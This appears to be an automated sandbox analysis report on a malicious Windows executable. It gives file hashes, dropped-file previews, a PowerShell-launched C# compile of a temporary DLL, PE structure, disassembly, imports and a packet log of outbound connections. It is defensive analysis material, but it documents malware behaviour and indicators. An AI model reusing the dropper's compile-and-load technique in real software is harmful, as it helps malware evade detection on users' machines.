                                                                                                                                                                                                                                              MD5:43C248E64183843BAB2C0F583786322D
                                                                                                                                                                                                                                              SHA1:77F87964345D30FC14DEAD0AA3CC2BFAF86C7DE3
                                                                                                                                                                                                                                              SHA-256:CE2639D2EA86126B63667BD3DB261841809C34918788647C5F0E995CE6F98546
                                                                                                                                                                                                                                              SHA-512:7F9EA2010060710445554BD578E37C8EF30721E88B7B16E93A6EB037FD5247AA736AFA93032F3A7EDFD290808165B2E9BEBC96D08C63711CFB27559F508707CF
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.0.cs"
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                                                              Entropy (8bit):3.1501686372996494
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:6r7oEAtf0KhzBU/zKf6mtJlN0RhpW1ulVIa30Hq:RNz0hmNORhvIK0
                                                                                                                                                                                                                                              MD5:C8816BB5B8D2C669BA2541BD2B0DFF9C
                                                                                                                                                                                                                                              SHA1:EB9C26C79DE67277BC43BC55E502DB952DD651CD
                                                                                                                                                                                                                                              SHA-256:2579B6C6285066ACB92D7E6735FF22F504A608065370DF49B6E34A3D60E3309E
                                                                                                                                                                                                                                              SHA-512:A40D6ECD4F59CD515EA0378EE98A6FD8A413FD8D0418EA11B87628A7B23E06005A287AE61C82F9C6E52A4B61C199A6F1C2C6B9BB48FFAF52F72D4B8C244605CD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (717), with CRLF, CR line terminators
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):1158
                                                                                                                                                                                                                                              Entropy (8bit):5.470307226088961
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:KOaQMAkId3ka6KOkqeFk/aJETaQKax5DqBVKVrdFAMBJTH:+Skkka6NkqeFkSJE+QK2DcVKdBJj
                                                                                                                                                                                                                                              MD5:87CE36056A6FF150071373D91DA5EEF1
                                                                                                                                                                                                                                              SHA1:F77A1E7D785167C52E5BB201D7F55B5930C4D5E7
                                                                                                                                                                                                                                              SHA-256:93390B6CD44A87674AD781037BBBB997E048DAD7DCE65365F53321B122588FEE
                                                                                                                                                                                                                                              SHA-512:EFD686E5920FD0FE77530531CE5992E8D8905451B1879B0972619DFC4BC6CCD903630E99C91977249954FB410D1404034FAE38527AEF2C773F61A0C75F325209
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                              Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                              MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                              SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                              SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                              SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..Service Version: 0.0.0.0..user Version: 0.0.0.0....No user/signature is currently loaded...
                                                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.993060687272905
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:wsapx.exe
                                                                                                                                                                                                                                              File size:7'839'456 bytes
                                                                                                                                                                                                                                              MD5:e302186ae6217d48fc6eef1fe780ec26
                                                                                                                                                                                                                                              SHA1:17fcd5699fc208e8b520eb9ad1c0b4a0305a5f0a
                                                                                                                                                                                                                                              SHA256:3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672
                                                                                                                                                                                                                                              SHA512:29cd7dc1704ba96d71e4cde67fd1d61426dff8c67003121ff4b2c60fd39066f9fe208717f3f1fd78ad991881681b9c9b4c9e790454963caaac3901d2b32313f2
                                                                                                                                                                                                                                              SSDEEP:196608:cdLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jt:SL+9qz8LD7fEUbiIqQgpt
                                                                                                                                                                                                                                              TLSH:3A863358A3A80CE0EE76503DDB56DC8BDB76F9022B10C9CB17A563266E27CC58437B71
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                                              Icon Hash:212303032313271a
                                                                                                                                                                                                                                              Entrypoint:0x14000ce20
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x67550E17 [Sun Dec 8 03:10:15 2024 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                              • 28/09/2021 20:00:00 28/09/2024 19:59:59
                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                              • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                              Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                              Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                              Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                              Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                              call 00007F05BD48844Ch
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                              jmp 00007F05BD48806Fh
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                              call 00007F05BD488818h
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007F05BD488213h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                              jmp 00007F05BD4881F7h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              cmp ecx, eax
                                                                                                                                                                                                                                              je 00007F05BD488206h
                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                              jne 00007F05BD4881E0h
                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                              jmp 00007F05BD4881E9h
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                              test ecx, ecx
                                                                                                                                                                                                                                              jne 00007F05BD4881F9h
                                                                                                                                                                                                                                              mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                              call 00007F05BD487945h
                                                                                                                                                                                                                                              call 00007F05BD488C30h
                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                              jne 00007F05BD4881F6h
                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                              jmp 00007F05BD488206h
                                                                                                                                                                                                                                              call 00007F05BD49574Fh
                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                              jne 00007F05BD4881FBh
                                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                                              call 00007F05BD488C40h
                                                                                                                                                                                                                                              jmp 00007F05BD4881DCh
                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                                                              cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                                                              jne 00007F05BD488259h
                                                                                                                                                                                                                                              cmp ecx, 01h
                                                                                                                                                                                                                                              jnbe 00007F05BD48825Ch
                                                                                                                                                                                                                                              call 00007F05BD48878Eh
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007F05BD48821Ah
                                                                                                                                                                                                                                              test ebx, ebx
                                                                                                                                                                                                                                              jne 00007F05BD488216h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                              call 00007F05BD495542h
                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x32b8.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x777a980x2448
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x764.reloc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rdata0x2b0000x12a280x12c004a4040b0038d1e3c8f998d706f5afb49False0.5243229166666666data5.750772643174072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rsrc0x470000x32b80x3400e65a00d83f520c22dfdafe892440ef3cFalse0.8287259615384616data7.466048435400415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .reloc0x4b0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_ICON0x472500x1c1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.024498886414254
                                                                                                                                                                                                                                              RT_ICON0x474140x20cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0209923664122138
                                                                                                                                                                                                                                              RT_ICON0x476200x273PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0175438596491229
                                                                                                                                                                                                                                              RT_ICON0x478940x434PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0102230483271375
                                                                                                                                                                                                                                              RT_ICON0x47cc80x53ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0081967213114753
                                                                                                                                                                                                                                              RT_ICON0x482080x9b9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.004419445560466
                                                                                                                                                                                                                                              RT_ICON0x48bc40xdc3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.930456996877661
                                                                                                                                                                                                                                              RT_GROUP_ICON0x499880x68data0.7403846153846154
                                                                                                                                                                                                                                              RT_VERSION0x499f00x3b8COM executable for DOS0.45063025210084034
                                                                                                                                                                                                                                              RT_MANIFEST0x49da80x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                                                              KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                              ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                              GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:23.488471031 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:23.608211040 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:23.608304977 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:23.609836102 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:23.729517937 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:24.707539082 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:24.766944885 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:24.887070894 CET8049721208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:37:24.887151003 CET4972180192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:01.387092113 CET4982380192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:01.506902933 CET8049823208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:01.506979942 CET4982380192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:01.507622004 CET4982380192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:01.627557039 CET8049823208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:02.717205048 CET8049823208.95.112.1192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:02.841561079 CET4982380192.168.2.6208.95.112.1
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:03.960500956 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:03.960556984 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:03.960635900 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:03.991020918 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:03.991045952 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.206526041 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.206934929 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.206964970 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.208031893 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.208098888 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.209430933 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.209501982 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.209778070 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.209786892 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.209924936 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.209955931 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210103989 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210154057 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210284948 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210325956 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210427999 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210443974 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210464954 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210474968 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210527897 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210546017 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210568905 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210580111 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210597992 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210606098 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210638046 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210650921 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210654020 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210664988 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210679054 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210695028 CET49832443192.168.2.6162.159.136.232
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210700035 CET44349832162.159.136.232192.168.2.6
                                                                                                                                                                                                                                              Dec 13, 2024 08:38:05.210712910 CET44349832162.159.136.232192.168.2.6
